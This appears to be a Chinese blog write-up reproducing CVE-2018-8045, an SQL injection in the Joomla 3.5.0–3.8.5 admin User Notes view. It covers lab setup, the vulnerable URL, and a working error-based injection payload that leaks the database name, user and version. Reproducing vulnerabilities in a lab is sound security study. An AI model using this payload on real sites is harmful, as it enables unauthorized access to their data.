Joomla内核SQL注入漏洞(CVE-2018-8045)

漏洞简介

Joomla是一套网站内容管理系统,使用PHP语言和MySQL数据库开发。Joomla! 3.5.0 -3.8.5版本对SQL语句内的变量缺少类型转换,导致User Notes列表视图内SQL注入漏洞,可使攻击者访问或修改数据等。

受影响版本

Joomla3.5.0-3.8.5

漏洞复现

环境搭建

下载地址https://downloads.joomla.org/cms/joomla3/3-8-2

测试版本是3.8.2

Joomla的运行环境是PHP+MYSQL+Apache,而phpStudy则集成了这三种程序,只要安装了phpStudy就等于安装的这三种程序,而且兼容性更好。需要phpstudy5.3或5.3以上的版本,我用的win2003中的5.4.45版本:

 

使用MYSQL命令行在数据库创建名为joomla的数据库:

 

 下载好Joomla(版本为3.8.5)的安装包,将其解压到C:\phpStudy\PHPTutorial\www\的目录下,然后在浏览器输入http://localhost/joomla,回车根据相关提示进行安装。

 

进入管理员登陆界面

http://192.168.xxx.xxx/Joomla_3.8.2-Stable-Full_Package/administrator/

登录账号密码后会有报错显示,不用管,直接访问下面这个路径

http://xxx/joomla/administrator/index.php?option=com_users&view=notes

按照提示选择:

使用burp抓取选择Uncatgonised时的数据包

注入payload:

 and extractvalue(1, concat(0x7e, (select database()), 0x7e))

在响应包里会有显示爆出数据库名:

也可爆出用户和版本号:

参考:

https://fengren.blog.csdn.net/article/details/108866756?spm=1001.2101.3001.6650.3&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-3-108866756-blog-122598841.pc_relevant_default&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-3-108866756-blog-122598841.pc_relevant_default&utm_relevant_index=3

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境_维梓梓的博客-CSDN博客_joomla3.7.0rce漏洞

CVE-2018-8045 Joomla内核SQL注入漏洞 - 菜包胖嘟嘟 - 博客园

 

 

 

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值